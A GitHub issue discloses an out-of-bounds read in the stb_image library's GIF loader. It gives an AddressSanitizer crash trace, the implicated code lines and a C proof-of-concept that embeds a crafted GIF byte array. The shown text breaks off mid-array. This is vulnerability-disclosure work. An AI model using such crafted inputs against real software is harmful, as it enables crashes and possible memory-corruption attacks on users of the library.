Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Out-of-bounds Memory Access in stb_image Library during GIF Image Processing #1620

Open
jsnv-dev opened this issue Mar 9, 2024 · 0 comments
Open

Out-of-bounds Memory Access in stb_image Library during GIF Image Processing #1620

jsnv-dev opened this issue Mar 9, 2024 · 0 comments

Comments

@jsnv-dev
Copy link

jsnv-dev commented Mar 9, 2024

Out-of-bounds Memory Access in stb_image Library during GIF Image Processing

Summary

An out-of-bounds memory access has been discovered in the stb_image.h library. This issue arises while processing GIF images loaded from memory, leading to a segmentation fault. This vulnerability may result in a denial of service (DoS) or could be exploited to execute arbitrary code.

Affected Component

The vulnerability affects the processing routines within the stb_image.h library that handles GIF images, specifically within the context of the stbi_load_gif_from_memory function.

SEGV Details

AddressSanitizer:DEADLYSIGNAL
=================================================================
==123==ERROR: AddressSanitizer: SEGV on unknown address 0x62ffffff6a28 (pc 0x707570258c23 bp 0x7ffdc3aa7d60 sp 0x7ffdc3aa7528 T0)
==123==The signal is caused by a READ memory access.
    #0 0x707570258c23  (/lib/x86_64-linux-gnu/libc.so.6+0xbbc23) (BuildId: eebe5d5f4b608b8a53ec446b63981bba373ca0ca)
    #1 0x49ca08 in __asan_memcpy /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
    #2 0x51b38c in stbi__gif_load_next /dev/shm/./stb_image.h:6815:16
    #3 0x4db9a9 in stbi__load_gif_main /dev/shm/./stb_image.h:6981:14
    #4 0x4db3ea in stbi_load_gif_from_memory /dev/shm/./stb_image.h:1449:30
    #5 0x4e0d31 in main /dev/shm/poc.c:208:26
    #6 0x7075701c1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) (BuildId: eebe5d5f4b608b8a53ec446b63981bba373ca0ca)
    #7 0x41c3ad in _start (/dev/shm/poc+0x41c3ad)

The issue is triggered by an out-of-bounds memory access during GIF image processing. The vulnerability is highlighted in the following segments of the code, as outlined by the stack trace:

  • stbi__gif_load_next (Line 6815):

    • Code snippet: memcpy( &g->out[pi * 4], &two_back[pi * 4], 4 );
    • Issue: Attempts to copy data for GIF processing without adequate bounds checking, leading to potential out-of-bounds access.

  • stbi__load_gif_main (Line 6981):

    • Code snippet: u = stbi__gif_load_next(s, &g, comp, req_comp, two_back);
    • Issue: Invokes stbi__gif_load_next, propagating the handling of potentially malformed or unexpected GIF data that could lead to unsafe memory operations.

  • stbi_load_gif_from_memory (Line 1449):

    • Code snippet: result = (unsigned char*) stbi__load_gif_main(&s, delays, x, y, z, comp, req_comp);
    • Issue: The GIF loading process begins, passing through critical data that, if not properly validated or managed, results in out-of-bounds memory access.

Steps to Reproduce

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define STB_IMAGE_IMPLEMENTATION
#include "stb_image.h"

int main(void) {
    int width, height, comp, frames;
    int *delays = NULL;

    unsigned char data[] = {
        0x47, 0x49, 0x46, 0x38, 0x39, 0x61, 0x4f, 0x00, 0x44, 0x00, 0xd5, 0x00, 0x00, 0xff, 0xff, 0xff, 
        0xf4, 0xf2, 0xf1, 0xde, 0xde, 0xde, 0xcf, 0xce, 0xcc, 0xbf, 0xbe, 0xbc, 0xfe, 0x94, 0x3b, 0xa2, 
        0xa1, 0xa0, 0xe2, 0x83, 0x31, 0x88, 0x83, 0x80, 0xf3, 0x5f, 0x5f, 0xcc, 0x6b, 0x2e, 0x77, 0x6f, 
        0x6a, 0xa5, 0x5d, 0x28, 0x66, 0x63, 0x63, 0xff, 0x3a, 0x29, 0x6e, 0x58, 0x51, 0xe8, 0x37, 0x29, 
        0x83, 0x52, 0x2d, 0xa0, 0x38, 0x34, 0xc5, 0x2d, 0x21, 0x48, 0x48, 0x48, 0x74, 0x3c, 0x27, 0xa5, 
        0x1e, 0x16, 0x85, 0x22, 0x1a, 0x37, 0x35, 0x33, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xfe, 0xff, 0xff, 
        0xff, 0x3c, 0x0e, 0x08, 0x1d, 0x13, 0x10, 0x0e, 0x0c, 0x0a, 0x00, 0x00, 0x00, 0xfe, 0x01, 0x02, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x21, 0xff, 0x0b, 
        0x4e, 0x45, 0x54, 0x53, 0x43, 0x41, 0x50, 0x45, 0x32, 0x2e, 0x30, 0x03, 0x01, 0x00, 0x00, 0x00, 
        0x21, 0xf9, 0x04, 0x04, 0x08, 0x00, 0xff, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x4f, 0x00, 0x44, 
        0x00, 0x00, 0x06, 0xff, 0x40, 0x80, 0x70, 0x48, 0x2c, 0x1a, 0x8f, 0xc8, 0xa4, 0x72, 0xc9, 0x6c, 
        0x3a, 0x9f, 0xd0, 0xa8, 0x74, 0x4a, 0xad, 0x5a, 0xa1, 0x01, 0x01, 0xc1, 0x80, 0xe8, 0x7a, 0xbb, 
        0x84, 0x41, 0xe0, 0x4a, 0x7e, 0x0e, 0x16, 0x18, 0xcd, 0x67, 0xcd, 0x6e, 0x7f, 0x3a, 0x18, 0x8a, 
        0x41, 0x30, 0x2e, 0xdb, 0x87, 0x01, 0x42, 0x43, 0xed, 0xee, 0xf7, 0x3b, 0x0d, 0x04, 0x75, 0x77, 
        0x57, 0x02, 0x0b, 0x1e, 0x7e, 0x89, 0x89, 0x14, 0x04, 0x84, 0x56, 0x02, 0x18, 0x8a, 0x92, 0x7e, 
        0x1a, 0x06, 0x83, 0x8e, 0x4f, 0x90, 0x93, 0x9b, 0x6e, 0x1e, 0x08, 0x97, 0x98, 0x4b, 0x9a, 0x9c, 
        0xa4, 0x6c, 0x9f, 0xa1, 0x4c, 0xa3, 0xa5, 0xa5, 0x9e, 0xa8, 0x4a, 0x01, 0x0d, 0xab, 0xb2, 0x6f, 
        0x8d, 0xae, 0x47, 0x06, 0x93, 0x1e, 0x1a, 0x7c, 0x7f, 0x1a, 0x1d, 0x93, 0x14, 0x02, 0xb6, 0x45, 
        0x02, 0xbf, 0x8a, 0x18, 0x03, 0x02, 0x02, 0x08, 0x88, 0x6d, 0x0d, 0xca, 0x02, 0xb1, 0x92, 0x08, 
        0xc3, 0x78, 0xd2, 0x8a, 0x06, 0xd6, 0x6d, 0x1d, 0xc2, 0x42, 0x03, 0xc6, 0x89, 0x18, 0xdd, 0xc3, 
        0x04, 0x93, 0x1a, 0xe3, 0x00, 0xe5, 0xa6, 0x45, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x06, 0x00, 
        0x0b, 0x00, 0x41, 0x00, 0x32, 0x00, 0x00, 0x06, 0xff, 0x40, 0x90, 0x70, 0x48, 0x2c, 0x1a, 0x8b, 
        0x18, 0x04, 0x82, 0x72, 0x04, 0x25, 0x11, 0x0d, 0x4f, 0x73, 0x4a, 0xad, 0x4e, 0x29, 0x02, 0x00, 
        0x40, 0xd0, 0x30, 0x62, 0xb5, 0x00, 0x83, 0x75, 0x4c, 0x6e, 0x1a, 0xc0, 0x80, 0x81, 0xa6, 0x78, 
        0x06, 0x07, 0x30, 0xe5, 0x38, 0x99, 0x12, 0x40, 0x03, 0x16, 0x44, 0xba, 0x1d, 0x21, 0xef, 0x53, 
        0x11, 0x68, 0x04, 0x01, 0x46, 0x02, 0x14, 0x6d, 0x00, 0x04, 0x7e, 0x8a, 0x46, 0x04, 0x60, 0x14, 
        0x1f, 0x06, 0x02, 0x1a, 0x1f, 0x94, 0x89, 0x1f, 0x18, 0x60, 0x92, 0x8b, 0x9b, 0x20, 0x8d, 0x00, 
        0x01, 0x94, 0x0b, 0x02, 0x70, 0x20, 0x1e, 0x04, 0x8f, 0x1f, 0x99, 0x6b, 0x9c, 0x8a, 0x9e, 0x04, 
        0x94, 0x58, 0xa4, 0xa6, 0x0d, 0x94, 0xaa, 0xac, 0x8a, 0x80, 0x5a, 0x52, 0x08, 0x6a, 0x42, 0x1e, 
        0x08, 0x62, 0xb9, 0x69, 0x52, 0xb7, 0x7d, 0x0d, 0x75, 0x69, 0x80, 0x06, 0xc4, 0x20, 0xc7, 0x76, 
        0x62, 0xc5, 0x7d, 0xa6, 0x68, 0x85, 0x44, 0x18, 0x03, 0x76, 0x5d, 0xd1, 0x7d, 0x18, 0x59, 0x9f, 
        0x0b, 0x1d, 0x45, 0x0d, 0xde, 0x61, 0xe1, 0xdb, 0x7d, 0x14, 0x04, 0x04, 0xe0, 0x46, 0x1e, 0x0d, 
        0xea, 0x06, 0xe6, 0xe7, 0xf3, 0xf4, 0xac, 0x1f, 0x54, 0xf2, 0xf5, 0x53, 0x1d, 0x11, 0x0c, 0x0a, 
        0xff, 0x00, 0x15, 0x50, 0x39, 0xf0, 0x8f, 0x81, 0xc1, 0x08, 0x1c, 0xf4, 0x11, 0x51, 0x50, 0xa0, 
        0x61, 0x01, 0x39, 0x05, 0x08, 0xfe, 0xab, 0xa0, 0x70, 0x08, 0x83, 0x86, 0x7e, 0x0a, 0x04, 0xa4, 
        0x58, 0xf1, 0x03, 0x07, 0x81, 0x8b, 0x22, 0xfc, 0xe3, 0x70, 0xaf, 0x23, 0x87, 0x08, 0x7d, 0x0e, 
        0x80, 0xe0, 0x48, 0xb2, 0x22, 0x11, 0x66, 0x64, 0x40, 0x4a, 0x81, 0xe9, 0xb2, 0xa6, 0xcd, 0x22, 
        0x09, 0xf5, 0x09, 0xb8, 0xc9, 0xd3, 0x26, 0xa9, 0x87, 0x26, 0x00, 0x39, 0xc4, 0x28, 0xbd, 0xa5, 
        0xfa, 0xfe, 0x08, 0xa8, 0x60, 0x95, 0x48, 0x87, 0x08, 0x1c, 0x3a, 0xd0, 0x92, 0xda, 0xa1, 0x2f, 
        0x87, 0xbf, 0x7f, 0x1f, 0x48, 0xa3, 0x46, 0xe1, 0x6e, 0x04, 0x27, 0x15, 0x9c, 0x26, 0xb2, 0xc0, 
        0x01, 0x49, 0x85, 0x02, 0x05, 0x14, 0x30, 0x78, 0x40, 0x99, 0xc1, 0x81, 0xcb, 0x90, 0x33, 0x1f, 
        0x88, 0x50, 0x99, 0x81, 0x82, 0xcf, 0x94, 0xe2, 0xfe, 0xb9, 0x70, 0x44, 0x4d, 0xe6, 0xd3, 0xa8, 
        0x53, 0x67, 0xfe, 0x2c, 0x39, 0xf4, 0x91, 0x0a, 0x7e, 0x1e, 0x58, 0x80, 0xd0, 0xf8, 0x26, 0x6c, 
        0x3f, 0x07, 0x58, 0x57, 0x48, 0x36, 0xc4, 0xc3, 0x06, 0x0b, 0x12, 0xe3, 0x18, 0x98, 0x20, 0xc4, 
        0x42, 0x1a, 0x70, 0x79, 0x18, 0x80, 0x38, 0x10, 0xe7, 0x73, 0x85, 0x08, 0x69, 0x8c, 0x6c, 0xc8, 
        0x74, 0xe1, 0x38, 0x38, 0x0f, 0x15, 0x2a, 0x28, 0x17, 0x93, 0x3b, 0xbb, 0x75, 0x70, 0xd3, 0x33, 
        0x39, 0x30, 0x8e, 0x9c, 0x4d, 0x07, 0xec, 0xcc, 0xa1, 0x74, 0xff, 0x0e, 0x3e, 0xc3, 0x10, 0xd2, 
        0xc2, 0x85, 0x10, 0x97, 0xff, 0x0b, 0x1c, 0x07, 0xcb, 0x4e, 0x24, 0x73, 0x28, 0xcf, 0xc6, 0x37, 
        0x23, 0x01, 0x0d, 0x6c, 0xe0, 0x80, 0x03, 0x45, 0x5c, 0xe0, 0x5a, 0x23, 0x1f, 0xdc, 0xa7, 0x40, 
        0x7a, 0x42, 0x28, 0x80, 0x57, 0x74, 0x55, 0xd5, 0x56, 0xd5, 0x59, 0x4f, 0xf4, 0x02, 0x02, 0x27, 
        0x10, 0x00, 0x37, 0x04, 0x04, 0x17, 0xec, 0xc7, 0xff, 0x1f, 0x1b, 0x80, 0x01, 0xf6, 0x21, 0x07, 
        0x17, 0x68, 0xa8, 0x21, 0x08, 0xc6, 0x81, 0x60, 0x94, 0x14, 0xf5, 0x10, 0x01, 0x81, 0x11, 0x19, 
        0x6e, 0xc0, 0x41, 0x5d, 0x51, 0x78, 0x40, 0xe2, 0x8b, 0xc5, 0x81, 0x90, 0x41, 0x06, 0x1b, 0x74, 
        0xf0, 0xcc, 0x35, 0x50, 0x10, 0x70, 0x20, 0x08, 0x1d, 0x9c, 0x68, 0x84, 0x03, 0x10, 0x4c, 0xd0, 
        0xa1, 0x84, 0x48, 0x0c, 0x29, 0xdf, 0x06, 0x1b, 0xb8, 0x77, 0x21, 0x72, 0x06, 0x3c, 0x21, 0xe4, 
        0x11, 0x1e, 0xc0, 0x17, 0x05, 0x8e, 0x47, 0x70, 0x49, 0xc4, 0x7c, 0x20, 0xc8, 0xc8, 0x9b, 0x10, 
        0x4d, 0x21, 0xa1, 0x54, 0x4e, 0x87, 0x8d, 0x42, 0x1a, 0x70, 0x17, 0xc0, 0xd5, 0x48, 0x03, 0x0b, 
        0x81, 0x70, 0xcb, 0x98, 0x6d, 0x05, 0x27, 0x01, 0x98, 0x91, 0x10, 0x08, 0xc2, 0x03, 0x06, 0x50, 
        0x48, 0x48, 0x95, 0x45, 0x10, 0xe5, 0x04, 0x9c, 0x43, 0x58, 0x70, 0x01, 0x9e, 0x83, 0xdc, 0x36, 
        0xc0, 0xa2, 0x63, 0x95, 0x39, 0xc4, 0x99, 0x64, 0x00, 0x67, 0xc1, 0x04, 0x5e, 0xc6, 0x31, 0x00, 
        0x36, 0x9b, 0xbc, 0x22, 0x96, 0x10, 0x0b, 0xd0, 0x39, 0xc4, 0x4a, 0x46, 0x94, 0x08, 0xc1, 0xa8, 
        0xa3, 0xc2, 0x38, 0x81, 0x04, 0x11, 0xbc, 0xe1, 0x04, 0xa8, 0x20, 0x7c, 0xb0, 0xa2, 0x44, 0x6e, 
        0x1a, 0x11, 0x27, 0x11, 0x48, 0xb2, 0xb4, 0x00, 0x65, 0xb8, 0x3e, 0x80, 0x00, 0x01, 0x02, 0xcc, 
        0x4a, 0xc4, 0xa6, 0x46, 0x00, 0x23, 0x84, 0xa0, 0x4e, 0x00, 0x4b, 0x46, 0x3b, 0xc8, 0x52, 0x23, 
        0x85, 0x4d, 0x01, 0x1c, 0x84, 0x88, 0x96, 0x99, 0x18, 0xc0, 0xea, 0x07, 0xe7, 0x64, 0x85, 0x48, 
        0xa5, 0x5a, 0xfd, 0xd9, 0x50, 0xb6, 0x4f, 0x01, 0x43, 0x14, 0x72, 0x14, 0xc4, 0xea, 0x84, 0x9e, 
        0xdc, 0xfe, 0xc2, 0x0a, 0x72, 0x86, 0xb0, 0x5a, 0xa9, 0xee, 0x11, 0x3a, 0x35, 0x32, 0xd5, 0x33, 
        0x1e, 0xec, 0xa5, 0xc8, 0xa7, 0x45, 0x18, 0xf9, 0x14, 0xa0, 0xe7, 0x48, 0x4b, 0x65, 0x2f, 0x1a, 
        0xec, 0x91, 0x96, 0x41, 0xed, 0x1e, 0x31, 0xdb, 0x97, 0x0f, 0x74, 0x22, 0x10, 0x35, 0x08, 0x60, 
        0xa1, 0xc1, 0x02, 0x61, 0x28, 0xf1, 0x2f, 0x33, 0x57, 0x16, 0x9b, 0xab, 0x9f, 0x7f, 0xe8, 0xf4, 
        0xd3, 0x2e, 0x01, 0x38, 0x0c, 0x42, 0xb2, 0x00, 0x6c, 0x0a, 0x6a, 0x37, 0xd1, 0x1e, 0x31, 0xce, 
        0x13, 0x2f, 0xad, 0x6b, 0x04, 0xc5, 0x51, 0x00, 0x10, 0xb1, 0xc9, 0x9e, 0x20, 0x02, 0x90, 0xc9, 
        0x5e, 0x79, 0x00, 0x28, 0x22, 0xea, 0x7c, 0xc2, 0x72, 0x24, 0x20, 0xd9, 0x5c, 0x89, 0x62, 0x20, 
        0x54, 0x80, 0x40, 0x59, 0x83, 0x30, 0xc0, 0x09, 0x06, 0x33, 0x23, 0xa2, 0x98, 0x07, 0x69, 0x32, 
        0xb0, 0x00, 0xd0, 0x7e, 0x28, 0x50, 0x1b, 0x25, 0x3c, 0x33, 0xb2, 0xdd, 0x10, 0x11, 0x14, 0x9d, 
        0x89, 0xba, 0x50, 0xc8, 0x23, 0x06, 0xd3, 0x83, 0x38, 0x29, 0x46, 0xd4, 0x37, 0xff, 0x61, 0x46, 
        0xd8, 0x63, 0x0c, 0x8d, 0xc1, 0xd9, 0x67, 0x93, 0xed, 0x87, 0x72, 0x18, 0x5c, 0x81, 0xf5, 0x20, 
        0x41, 0x00, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 
        0x01, 0x00, 0x01, 0x00, 0x82, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 
        0x00, 0x20, 0x00, 0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 
        0x50, 0x10, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0b, 0x00, 
        0x17, 0x00, 0x0f, 0x00, 0x00, 0x06, 0x93, 0x40, 0x10, 0xc8, 0x83, 0x29, 0x7a, 0x84, 0xc8, 0xa4, 
        0xa6, 0xa8, 0x49, 0x7a, 0x28, 0x8d, 0x28, 0xe5, 0x98, 0x14, 0x62, 0xa2, 0x51, 0x0c, 0xf2, 0x8a, 
        0x6d, 0x68, 0xab, 0x9e, 0x6e, 0xf4, 0x18, 0x16, 0x37, 0xa8, 0x5b, 0x2c, 0xd4, 0x0b, 0xba, 0x52, 
        0xde, 0x6f, 0x36, 0xf2, 0x09, 0x45, 0x2c, 0xe0, 0xcf, 0x06, 0x82, 0x40, 0x58, 0x34, 0x28, 0x5f, 
        0x42, 0x1a, 0x0b, 0x06, 0x08, 0x00, 0x20, 0x02, 0x06, 0x0d, 0x83, 0x02, 0x42, 0x0b, 0x42, 0x89, 
        0x55, 0x48, 0x0d, 0x48, 0x01, 0x60, 0x92, 0x98, 0x55, 0x06, 0x99, 0x9c, 0x48, 0x8d, 0x8f, 0x82, 
        0x42, 0x04, 0x92, 0x04, 0x1f, 0x1f, 0xa0, 0x49, 0x96, 0x20, 0x06, 0x1f, 0x1a, 0xaa, 0x48, 0x1f, 
        0x7d, 0x14, 0x8d, 0x42, 0x06, 0x1d, 0x20, 0x7a, 0x7c, 0x76, 0x67, 0x55, 0x18, 0x0b, 0x7c, 0x04, 
        0x08, 0x72, 0x1a, 0x70, 0x6f, 0x4d, 0x60, 0xc5, 0x7f, 0x54, 0x44, 0x58, 0x81, 0x55, 0xc4, 0x52, 
        0xc7, 0x42, 0x11, 0x15, 0xd5, 0x11, 0x9d, 0xd6, 0x48, 0x41, 0x00, 0x21, 0xf9, 0x04, 0xb5, 0x05, 
        0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0e, 0x00, 0x17, 0x00, 0x31, 0x00, 0x00, 0x06, 0x78, 
        0x40, 0x90, 0x70, 0x48, 0x2c, 0x0e, 0x1b, 0x44, 0x4d, 0x63, 0xc9, 0x6c, 0x68, 0x8c, 0xcd, 0xa5, 
        0x10, 0x13, 0x95, 0x12, 0x3d, 0xd5, 0xa5, 0x87, 0x92, 0xa5, 0x10, 0x3b, 0xd9, 0x46, 0x87, 0x5b, 
        0xf5, 0x0e, 0xc1, 0xd9, 0x31, 0x99, 0x49, 0xc1, 0x5c, 0xd7, 0x6c, 0x0f, 0xc6, 0xa3, 0xa1, 0xd8, 
        0x35, 0x9f, 0xe7, 0xd0, 0xf3, 0xc9, 0x63, 0xfe, 0x7c, 0x79, 0x0d, 0x18, 0x1d, 0x85, 0x54, 0x6e, 
        0x44, 0x5c, 0x7f, 0x7f, 0x76, 0x1f, 0x5b, 0x51, 0x66, 0x49, 0x01, 0x00, 0x01, 0x1f, 0x51, 0x45, 
        0x93, 0x46, 0x42, 0x4c, 0x96, 0x99, 0x9a, 0x9b, 0x9c, 0x9d, 0x9e, 0x9f, 0xa0, 0xa1, 0xa2, 0xa3, 
        0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xab, 0xac, 0xad, 0xae, 0xaf, 0xb0, 0xb1, 0xb2, 0xb3, 
        0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xbb, 0x9f, 0x0b, 0x44, 0x41, 0x00, 0x21, 0xf9, 0x04, 
        0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0b, 0x00, 0x17, 0x00, 0x34, 0x00, 0x00, 0x06, 
        0xc6, 0x40, 0x10, 0x48, 0x83, 0x28, 0x6a, 0x84, 0xc8, 0x64, 0xa3, 0xd8, 0x48, 0x62, 0x06, 0x80, 
        0xe8, 0x00, 0x93, 0x44, 0x22, 0x02, 0xd1, 0x00, 0x02, 0x69, 0x88, 0x7a, 0x0d, 0x55, 0x10, 0x46, 
        0xe0, 0x05, 0x08, 0xa8, 0xe3, 0xb2, 0x99, 0x9a, 0x44, 0xa8, 0x01, 0xdb, 0xc6, 0x1b, 0xd0, 0x44, 
        0x76, 0x06, 0x01, 0xa8, 0x77, 0xd0, 0xe9, 0x46, 0x05, 0x14, 0x14, 0x00, 0x60, 0x48, 0x18, 0x01, 
        0x1a, 0x1f, 0x7e, 0x00, 0x01, 0x18, 0x04, 0xa2, 0x77, 0xe1, 0x04, 0x04, 0x4e, 0x04, 0x1f, 0x1f, 
        0x82, 0x5e, 0x8d, 0x5e, 0x96, 0x1f, 0x04, 0x93, 0x85, 0x08, 0x96, 0x18, 0x65, 0x9a, 0x51, 0x9c, 
        0x9e, 0x4e, 0x06, 0xa2, 0xa4, 0x6e, 0x51, 0x20, 0x96, 0x02, 0x5b, 0x48, 0x1a, 0x53, 0x1e, 0x8e, 
        0x7f, 0x1a, 0x98, 0x8b, 0x08, 0x5d, 0x14, 0x49, 0x1e, 0x7a, 0x65, 0x03, 0x1e, 0x77, 0x6a, 0x7c, 
        0x55, 0x0b, 0x6f, 0x0b, 0x42, 0x14, 0x58, 0x59, 0x75, 0x49, 0xb4, 0xc2, 0x47, 0x20, 0x1d, 0x57, 
        0xbb, 0x61, 0x42, 0x0f, 0x64, 0x66, 0xbe, 0x48, 0x0c, 0x0f, 0xe1, 0x0c, 0xd9, 0x48, 0xe2, 0xe4, 
        0xe7, 0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 0xef, 0xf0, 0xf1, 0xf2, 0xf3, 0xf4, 0xf5, 0xf6, 
        0xf7, 0xf8, 0xf9, 0xfa, 0xfb, 0xfc, 0xfd, 0xfe, 0xff, 0x00, 0x03, 0x0a, 0x1c, 0x48, 0xb0, 0xa0, 
        0xc1, 0x83, 0xee, 0xa0, 0x81, 0x08, 0x02, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 
        0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x06, 0x03, 0x40, 0x50, 0x10, 0x00, 
        0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 0x0b, 0x00, 0x17, 0x00, 0x0f, 
        0x00, 0x00, 0x06, 0x93, 0x40, 0x10, 0xc8, 0x83, 0x29, 0x7a, 0x84, 0xc8, 0xa4, 0xa6, 0xa8, 0x49, 
        0x7a, 0x28, 0x8d, 0x28, 0xe5, 0x98, 0x14, 0x62, 0xa2, 0x51, 0x0c, 0xf2, 0x8a, 0x6d, 0x68, 0xab, 
        0x9e, 0x6e, 0xf4, 0x18, 0x16, 0x37, 0xa8, 0x5b, 0x2c, 0xd4, 0x0b, 0xba, 0x52, 0xde, 0x6f, 0x36, 
        0xf2, 0x09, 0x45, 0x2c, 0xe0, 0xcf, 0x06, 0x82, 0x40, 0x58, 0x34, 0x28, 0x5f, 0x42, 0x1a, 0x0b, 
        0x06, 0x08, 0x00, 0x20, 0x02, 0x06, 0x0d, 0x83, 0x02, 0x42, 0x0b, 0x42, 0x89, 0x55, 0x48, 0x0d, 
        0x48, 0x01, 0x60, 0x92, 0x98, 0x55, 0x06, 0x99, 0x9c, 0x48, 0x8d, 0x8f, 0x82, 0x42, 0x04, 0x92, 
        0x04, 0x1f, 0x1f, 0xa0, 0x49, 0x96, 0x20, 0x06, 0x1f, 0x1a, 0xaa, 0x48, 0x1f, 0x7d, 0x14, 0x8d, 
        0x42, 0x06, 0x1d, 0x20, 0x7a, 0x7c, 0x76, 0x67, 0x55, 0x18, 0x0b, 0x7c, 0x04, 0x08, 0x72, 0x1a, 
        0x70, 0x6f, 0x4d, 0x60, 0xc5, 0x7f, 0x54, 0x44, 0x58, 0x81, 0x55, 0xc4, 0x52, 0xc7, 0x42, 0x11, 
        0x15, 0xd5, 0x11, 0x9d, 0xd6, 0x48, 0x41, 0x00, 0x21, 0xf9, 0x04, 0x05, 0x08, 0x00, 0x20, 0x00, 
        0x2c, 0x1d, 0x00, 0x0e, 0x00, 0x17, 0x00, 0x31, 0x00, 0xfe, 0xff, 0xff, 0xff, 0x90, 0x70, 0x48, 
        0x2c, 0x0e, 0x1b, 0x44, 0x4d, 0x63, 0xc9, 0x6c, 0x68, 0x8c, 0xcd, 0xa5, 0x10, 0x13, 0x95, 0x12, 
        0x3d, 0xd5, 0xa5, 0x87, 0x92, 0xa5, 0x10, 0x3b, 0xd9, 0x46, 0x87, 0x5b, 0xf5, 0x0e, 0xc1, 0xd9, 
        0x31, 0x99, 0x49, 0xc1, 0x5c, 0xd7, 0x6c, 0x0f, 0xc6, 0xa3, 0xa1, 0xd8, 0x35, 0x9f, 0xe7, 0xd0, 
        0xf3, 0xc9, 0x63, 0xfe, 0x7c, 0x79, 0x0d, 0x18, 0x1d, 0x85, 0x54, 0x6e, 0x44, 0x5c, 0x7f, 0x7f, 
        0x76, 0x1f, 0x5b, 0x51, 0x66, 0x49, 0x51, 0x45, 0x93, 0x46, 0x42, 0x4c, 0x96, 0x99, 0x9a, 0x9b, 
        0x9c, 0x9d, 0x9e, 0x9f, 0xa0, 0xa1, 0xa2, 0xa3, 0xa4, 0xa5, 0xa6, 0xa7, 0xa8, 0xa9, 0xaa, 0xab, 
        0xac, 0xad, 0xae, 0xaf, 0xb0, 0xb1, 0xb2, 0xb3, 0xb4, 0xb5, 0xb6, 0xb7, 0xb8, 0xb9, 0xba, 0xbb, 
        0x9f, 0x0b, 0x44, 0x41, 0x00, 0x21, 0xf9, 0x04, 0x2e, 0x08, 0x00, 0x20, 0x00, 0x2c, 0x1d, 0x00, 
        0x0b, 0x00, 0x17, 0x00, 0x34, 0x00, 0x00, 0x06, 0xc6, 0x40, 0x10, 0x48, 0x83, 0x28, 0x6a, 0x84, 
        0xc8, 0x64, 0xa3, 0xd8, 0x48, 0x62, 0x06, 0x80, 0xe8, 0x00, 0x93, 0x44, 0x22, 0x02, 0xd1, 0x00, 
        0x02, 0x69, 0x88, 0x7a, 0x0d, 0x55, 0x10, 0x46, 0xe0, 0x05, 0x08, 0xa8, 0xe3, 0xb2, 0x99, 0x9a, 
        0x44, 0xa8, 0x01, 0xdb, 0xc6, 0x1b, 0xd0, 0x44, 0x76, 0x06, 0x01, 0xa8, 0x77, 0xd0, 0xe9, 0x46, 
        0x05, 0x14, 0x14, 0x00, 0x60, 0x48, 0x18, 0x01, 0x1a, 0x1f, 0x7e, 0x00, 0x01, 0x18, 0x04, 0x5e, 
        0x88, 0x1f, 0x03, 0x04, 0x4e, 0x04, 0x1f, 0x1f, 0x82, 0x5e, 0x8d, 0x5e, 0x96, 0x1f, 0x04, 0x93, 
        0x85, 0x08, 0x96, 0x18, 0x65, 0x9a, 0x51, 0x9c, 0x9e, 0x4e, 0x06, 0xa2, 0xa4, 0x6e, 0x51, 0x20, 
        0x96, 0x02, 0x5b, 0x48, 0x1a, 0x53, 0x1e, 0x8e, 0x7f, 0x1a, 0x98, 0x8b, 0x08, 0x5d, 0x14, 0x49, 
        0x1e, 0x7a, 0x65, 0x03, 0x1e, 0x77, 0x6a, 0x7c, 0x55, 0x0b, 0x6f, 0x0b, 0x42, 0x14, 0x58, 0x59, 
        0x75, 0x49, 0xb4, 0xc2, 0x47, 0x20, 0x1d, 0x57, 0xbb, 0x61, 0x42, 0x0f, 0x64, 0x66, 0xbe, 0x48, 
        0x0c, 0x0f, 0xe1, 0x0c, 0xd9, 0x48, 0xe2, 0xe4, 0xe7, 0xe8, 0xe9, 0xea, 0xeb, 0xec, 0xed, 0xee, 
